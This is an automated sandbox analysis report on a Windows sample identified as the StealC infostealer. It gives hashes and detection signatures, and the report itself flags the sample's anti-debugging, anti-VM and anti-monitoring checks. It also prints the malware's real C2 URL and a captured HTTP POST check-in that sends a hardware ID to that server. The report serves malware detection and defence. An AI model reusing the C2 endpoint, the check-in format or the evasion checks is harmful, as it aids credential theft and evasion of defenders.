Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1531077
MD5:3c4a472bba3dee50286e154336b9643e
SHA1:8aeb79c1357013ae448e4365786b3352d5436b11
SHA256:8bc63380429f0d4476b62f4e52eca341094f21d326f82535d61a5a5035840a89
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3C4A472BBA3DEE50286E154336B9643E)
  • cleanup

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1817097974.0000000000FDE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1775667377.0000000004D40000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7284JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7284JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.120000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-10T20:25:12.186591+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: http://185.215.113.37/wsURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.120000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0012C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00127240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00127240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00129AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00129AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00129B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00129B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00138EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00138EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_001338B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00134910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00134910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0012DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0012E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0012ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00134570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00134570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0012DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0012BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0012F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00133EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00133EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001216D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDBFIEGIDGIECBKJECHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 34 43 46 32 42 45 36 44 46 39 31 39 32 32 30 36 33 34 39 37 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 2d 2d 0d 0a Data Ascii: ------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="hwid"24CF2BE6DF91922063497------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="build"doma------CFHDBFIEGIDGIECBKJEC--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00124880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00124880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDBFIEGIDGIECBKJECHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 34 43 46 32 42 45 36 44 46 39 31 39 32 32 30 36 33 34 39 37 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 2d 2d 0d 0a Data Ascii: ------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="hwid"24CF2BE6DF91922063497------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="build"doma------CFHDBFIEGIDGIECBKJEC--
                Source: file.exe, 00000000.00000002.1817097974.0000000000FDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1817097974.0000000001037000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1817097974.0000000001037000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/b5
                Source: file.exe, 00000000.00000002.1817097974.0000000001025000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1817097974.0000000001025000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3
                Source: file.exe, 00000000.00000002.1817097974.0000000001025000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpo
                Source: file.exe, 00000000.00000002.1817097974.0000000001025000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phps
                Source: file.exe, 00000000.00000002.1817097974.0000000001037000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpv
                Source: file.exe, 00000000.00000002.1817097974.0000000001037000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.1817097974.0000000000FDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37vly

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB0470_2_004FB047
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F28540_2_004F2854
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E50AC0_2_004E50AC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EF1240_2_004EF124
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A71F30_2_003A71F3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EBB7A0_2_004EBB7A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004053A80_2_004053A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F0D0D0_2_004F0D0D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F5DFE0_2_004F5DFE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F4DA80_2_004F4DA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E85BE0_2_004E85BE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E3EDF0_2_004E3EDF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FC6D20_2_004FC6D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E9F9D0_2_004E9F9D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F77A90_2_004F77A9
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 001245C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: wdprdbdb ZLIB complexity 0.9946403986873869
                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: file.exe, 00000000.00000003.1775667377.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00139600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00139600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00133720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00133720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\K8ACIWTK.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1852928 > 1048576
                Source: file.exeStatic PE information: Raw size of wdprdbdb is bigger than: 0x100000 < 0x19e400

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.120000.0.unpack :EW;.rsrc :W;.idata :W; :EW;wdprdbdb:EW;rwcfgkti:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;wdprdbdb:EW;rwcfgkti:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00139860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00139860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cdbc8 should be: 0x1d09e7
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: wdprdbdb
                Source: file.exeStatic PE information: section name: rwcfgkti
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D205A push edi; mov dword ptr [esp], eax0_2_005D209C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push eax; mov dword ptr [esp], edx0_2_004FB085
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push 3E3B42DCh; mov dword ptr [esp], edi0_2_004FB0AE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push 5AEF113Dh; mov dword ptr [esp], ecx0_2_004FB0C2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push eax; mov dword ptr [esp], 7D9C48B7h0_2_004FB1C5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push edx; mov dword ptr [esp], ecx0_2_004FB1D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push eax; mov dword ptr [esp], ebp0_2_004FB287
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push eax; mov dword ptr [esp], 77EAD90Ah0_2_004FB2A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push edx; mov dword ptr [esp], 3FFF3F9Eh0_2_004FB2FB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push 05A78CB0h; mov dword ptr [esp], eax0_2_004FB38D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push esi; mov dword ptr [esp], 5F727204h0_2_004FB3B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push ebp; mov dword ptr [esp], esi0_2_004FB433
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push eax; mov dword ptr [esp], 63DDDC61h0_2_004FB437
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push 63242CFEh; mov dword ptr [esp], eax0_2_004FB444
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push 273BF17Eh; mov dword ptr [esp], ebp0_2_004FB46E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push edx; mov dword ptr [esp], 2AB401F0h0_2_004FB484
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push eax; mov dword ptr [esp], edi0_2_004FB4E3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push 43ADD7B9h; mov dword ptr [esp], edx0_2_004FB572
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push edi; mov dword ptr [esp], esi0_2_004FB59B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push 08C8D25Ah; mov dword ptr [esp], eax0_2_004FB616
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push ecx; mov dword ptr [esp], 00000000h0_2_004FB678
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push 75731C7Fh; mov dword ptr [esp], edi0_2_004FB6D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push edi; mov dword ptr [esp], 47EF5DD5h0_2_004FB761
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push eax; mov dword ptr [esp], ecx0_2_004FB783
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push 595A2AC5h; mov dword ptr [esp], ebx0_2_004FB7C2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push 6A25A400h; mov dword ptr [esp], edx0_2_004FB806
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push ebp; mov dword ptr [esp], ecx0_2_004FB82C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push 4D5A1DD5h; mov dword ptr [esp], edi0_2_004FB83D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push 743AA806h; mov dword ptr [esp], ebp0_2_004FB855
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push 6DA213C0h; mov dword ptr [esp], edx0_2_004FB999
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FB047 push 4739350Ah; mov dword ptr [esp], esi0_2_004FB9E7
                Source: file.exeStatic PE information: section name: wdprdbdb entropy: 7.95311750631902

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00139860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00139860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13542
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA716 second address: 4FA73A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 push ebx 0x00000008 jmp 00007FB438CB0C08h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA73A second address: 4FA744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB438C6F726h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5014A4 second address: 5014AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5014AA second address: 5014C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB438C6F726h 0x0000000a popad 0x0000000b push edi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007FB438C6F72Ch 0x00000013 pop edi 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5014C9 second address: 501506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB438CB0BF6h 0x0000000a popad 0x0000000b jmp 00007FB438CB0C08h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB438CB0C02h 0x00000017 jl 00007FB438CB0BF6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5031F2 second address: 5031F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5032F8 second address: 50332F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 43C67732h 0x0000000c push 00000003h 0x0000000e sub edx, dword ptr [ebp+122D1BA2h] 0x00000014 push 00000000h 0x00000016 mov ecx, 754B452Dh 0x0000001b push 00000003h 0x0000001d push 880D5CA0h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FB438CB0C01h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50332F second address: 503339 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB438C6F726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503339 second address: 50333F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
